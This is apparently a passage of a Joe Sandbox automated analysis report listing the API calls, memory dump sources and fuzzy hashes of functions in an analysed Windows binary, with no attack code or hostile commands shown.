                                                • Opcode Fuzzy Hash: d3829a019965efe2c2213293668e43e0480c35bf9bf1799d4ded068ecb45c712
                                                • Instruction Fuzzy Hash: 45216F71900218DEDF18EFA4E885EDE7BF9EF48300F5401AAE109E72A1DB359A45CB65
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-0
                                                • Opcode ID: f43a4061a8e025a0d144812a71714a97577523fe3e13b9d8efaa848aa49f0c00
                                                • Instruction ID: 1ff11e25f94873dc5e910a4ceff72672155d2c796c28b6462c6a50c51151f8b8
                                                • Opcode Fuzzy Hash: f43a4061a8e025a0d144812a71714a97577523fe3e13b9d8efaa848aa49f0c00
                                                • Instruction Fuzzy Hash: 0D016DB1841218EEDB00EBE4D886ADE7BF8AF14314F4444A5F505A6182C7389B89CB71
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c28cee5776741015569418dd2858f4ab74fe8efd64d80c4ecd7b665edd92a099
                                                • Instruction ID: e097ae29fe3417d823a63f435c21a9a0ef09cfee108ae56777bf3a3e4073774f
                                                • Opcode Fuzzy Hash: c28cee5776741015569418dd2858f4ab74fe8efd64d80c4ecd7b665edd92a099
                                                • Instruction Fuzzy Hash: 50E0653116122196DA6136A59D31B5B3AF8DF413A0F3941E1FE5CA7291DF61CE0085A5
                                                APIs
                                                  • Part of subcall function 00B0F826: __EH_prolog3_GS.LIBCMT ref: 00B0F830
                                                  • Part of subcall function 00B0F826: FindFirstFileW.KERNELBASE(?,?,00000274,00B0F733,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?), ref: 00B0F859
                                                  • Part of subcall function 00B0F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F8A4
                                                  • Part of subcall function 00B0F826: GetLastError.KERNEL32(?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049,?,00000000), ref: 00B0F902
                                                • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?,?,?,?), ref: 00B0F739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                • String ID:
                                                • API String ID: 765066492-0
                                                • Opcode ID: 5b1c95265aba80fc70ca0c8fb6e5625617fe0cae205d63e17418b194d2b34e5d
                                                • Instruction ID: c911f3e995b0eafd7951a95fabb52adba279843603d0adf7680257458adffca0
                                                • Opcode Fuzzy Hash: 5b1c95265aba80fc70ca0c8fb6e5625617fe0cae205d63e17418b194d2b34e5d
                                                • Instruction Fuzzy Hash: D3F0A73100D791AECE311BA44804A9B7FD1AF16370F104F99F0F9125D2C270D4549B23
                                                APIs
                                                • SetThreadExecutionState.KERNEL32(00000001), ref: 00B1742D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExecutionStateThread
                                                • String ID:
                                                • API String ID: 2211380416-0
                                                • Opcode ID: 8d2ecb407d8997025271ce9e75d77ba75d0047a812cd999b61ba3acefabfad61
                                                • Instruction ID: 02f05b230eac86582d8a2bc616cab0a1ae28dd3db89ca87001644a31e928b585
                                                • Opcode Fuzzy Hash: 8d2ecb407d8997025271ce9e75d77ba75d0047a812cd999b61ba3acefabfad61
                                                • Instruction Fuzzy Hash: 1ED05B1174905066FA253B2568877FD1DD6AFC6315F4900F6B019673C3CE944CC693E6
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00B01206
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 118556049-0
                                                • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                • Instruction ID: 800daeccf5180175ba7eff009ba9d39571cb1b4f4fb8fb2fe9ff962171c2e575
                                                • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                • Instruction Fuzzy Hash: 50D05EB66026024FC72EEF3CD96682E7AD49F503053104AADF02BCA6C2DF31CC25C615
                                                APIs
                                                • GdipAlloc.GDIPLUS(00000010), ref: 00B1EB0C
                                                  • Part of subcall function 00B1E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B1E86A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                • String ID:
                                                • API String ID: 1915507550-0
                                                • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                • Instruction ID: bae64452ed50c35e32526bb72612f085ee65ae465dac1a0bfe427603eac338f7
                                                • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                • Instruction Fuzzy Hash: 7CD0A73020420AB6DF012B208C429BF75D4DF00340F848161BC1685150EA70E9505260
                                                APIs
                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B24256
                                                  • Part of subcall function 00B20678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B20689
                                                  • Part of subcall function 00B20678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2069A
                                                  • Part of subcall function 00B20678: IsDialogMessageW.USER32(00010460,?), ref: 00B206AE
                                                  • Part of subcall function 00B20678: TranslateMessage.USER32(?), ref: 00B206BC
                                                  • Part of subcall function 00B20678: DispatchMessageW.USER32(?), ref: 00B206C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                • String ID:
                                                • API String ID: 897784432-0
                                                • Opcode ID: e9aa7292cf46e5ccbd1f1163a669b21624cc4390a999d11a16a0840ca21e1c6e
                                                • Instruction ID: cfc79df114391ff956e0e378ad2f6797efb6a10b9161795bc33ee0e037bc6795
                                                • Opcode Fuzzy Hash: e9aa7292cf46e5ccbd1f1163a669b21624cc4390a999d11a16a0840ca21e1c6e
                                                • Instruction Fuzzy Hash: 87D09E31144300AAD6122B51DE0AF1A7AE2EB9CB05F4045D4B349750F1CA629E319B12
                                                APIs
                                                  • Part of subcall function 00B24DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00B24DF2
                                                • DloadProtectSection.DELAYIMP ref: 00B24D54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AcquireDloadExclusiveLockProtectSection
                                                • String ID:
                                                • API String ID: 3680172570-0
                                                • Opcode ID: c2db617e82d0c6730e9fd4475575cee626c31234cc1186ae215a576f8db04a5b
                                                • Instruction ID: 364434b31095065ffedcec3e62b902afd8df588c7b5a172e92de3ce30e96b689
                                                • Opcode Fuzzy Hash: c2db617e82d0c6730e9fd4475575cee626c31234cc1186ae215a576f8db04a5b
                                                • Instruction Fuzzy Hash: 64D0C9361046709ED765BB28BC9AB9822E0F304386B9105E1E25D869E4CF6058549601
                                                APIs
                                                • GetFileType.KERNELBASE(000000FF,00B0E052,?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E15E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID:
                                                • API String ID: 3081899298-0
                                                • Opcode ID: 742a9d22dd07bac26bd417facbd3a9dbe83f4eef5b02617b2a0ed027703545ec
                                                • Instruction ID: 5f510a31712a8f431f92d9f406943bd24caab26e6d697dea5689545abc52c900
                                                • Opcode Fuzzy Hash: 742a9d22dd07bac26bd417facbd3a9dbe83f4eef5b02617b2a0ed027703545ec
                                                • Instruction Fuzzy Hash: 24C00239400249DACE254A28984949D7AA2EA523A67B49BD4D039AA5E1C732CC97EA11
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a550521674a351a784cc9731f1b9bbd32e707159d947ceb89ba6298f9cb3e5ac
                                                • Instruction ID: 79d0c49e5e8e054230b3586eda11f7ed28e890b4e5032307c94ef253289aa9fe
                                                • Opcode Fuzzy Hash: a550521674a351a784cc9731f1b9bbd32e707159d947ceb89ba6298f9cb3e5ac
                                                • Instruction Fuzzy Hash: 81B012863DD0206D320491147E02D3701CDC0C3B1173086DAF80CD1881EE804D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 08b2246b414463554a3625ef56238b4b4afedcec6afd6d63c60b98d9a7c0c16f
                                                • Instruction ID: 93e370babf8ff4f8026ca436c06b14a8beba30ab9438e76171e0e10e3eba5d8d
                                                • Opcode Fuzzy Hash: 08b2246b414463554a3625ef56238b4b4afedcec6afd6d63c60b98d9a7c0c16f
                                                • Instruction Fuzzy Hash: 9FB012963DC0206C3204A1147F02D3701CDC0C2B1133046DAF80CD1841FE814F891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a82b4aaa4ba113076e4f6096af3885bc5ee11c04f38356400f38564b26589425
                                                • Instruction ID: 7f686216669bd0c9765b630b2a50f0bd993f0668e4103768f6746986c8935155
                                                • Opcode Fuzzy Hash: a82b4aaa4ba113076e4f6096af3885bc5ee11c04f38356400f38564b26589425
                                                • Instruction Fuzzy Hash: 7DB012963DC1206C3344A1147E02D3701CDC0C2B1133047DAF40CD1841EE804EC81032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8204e1049611ef23f3c3b75b4f80f6fe54367474d6c548b439242091e08b37c9
                                                • Instruction ID: be60c8362a7c221d49f392a2816df36cf3485554122b9dc523bbfc00cf2808bd
                                                • Opcode Fuzzy Hash: 8204e1049611ef23f3c3b75b4f80f6fe54367474d6c548b439242091e08b37c9
                                                • Instruction Fuzzy Hash: 74B012863DC0206C320891747E02D3701CCC0C2B113308ADAF40CD1941EE804D8C1432
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: d71955a7b4336c28ea627609e801e6660be6c95753603a22027f49d4f8159b52
                                                • Instruction ID: a79f76e5c0319b9a9d30357ecc699734227334cd996491d0f9f0aaf2a3fdef1e
                                                • Opcode Fuzzy Hash: d71955a7b4336c28ea627609e801e6660be6c95753603a22027f49d4f8159b52
                                                • Instruction Fuzzy Hash: 43B012963DC1206C3204A1147E02D3701CDC0C3B1133086DAF80CD1841EE804E881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 1361ec6803cbd228efcee50fe83552acd2fb3bf215a5a5c750ef75e97972ed56
                                                • Instruction ID: 7c985ffa402c1929c76523fc7e88b46804cc5e1b40afb762f9559b124c95e7ca
                                                • Opcode Fuzzy Hash: 1361ec6803cbd228efcee50fe83552acd2fb3bf215a5a5c750ef75e97972ed56
                                                • Instruction Fuzzy Hash: 2DB012863ED0206D320491247E02D3701CEC4C2B1173046DAF40CD1841EE804D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 279732529fa6ac7939f5965b3bbe933cb46da3d47d57020b93d4c2158e948357
                                                • Instruction ID: e05799d888a03608d59c6d258c144d7ff41ce20b8588e59da15aba52b2a5df64
                                                • Opcode Fuzzy Hash: 279732529fa6ac7939f5965b3bbe933cb46da3d47d57020b93d4c2158e948357
                                                • Instruction Fuzzy Hash: DDB012963DD1206D334492147E02D3701CDC0C2B1173047DAF40CD1841EE804DC81032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: fee7524540d7f5b1caa4da7724d3a8c71aaff01e1e6951e9d1d8f0ba0310351c
                                                • Instruction ID: dd1d079df613b4ec1c374fe2ff45f9e08cba0ea7d32845d007154c1a391686fe
                                                • Opcode Fuzzy Hash: fee7524540d7f5b1caa4da7724d3a8c71aaff01e1e6951e9d1d8f0ba0310351c
                                                • Instruction Fuzzy Hash: 15B012863EC1206C32049124BE02D3B01DCC0C2B1133047DBF40CD1841EEC04D881032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
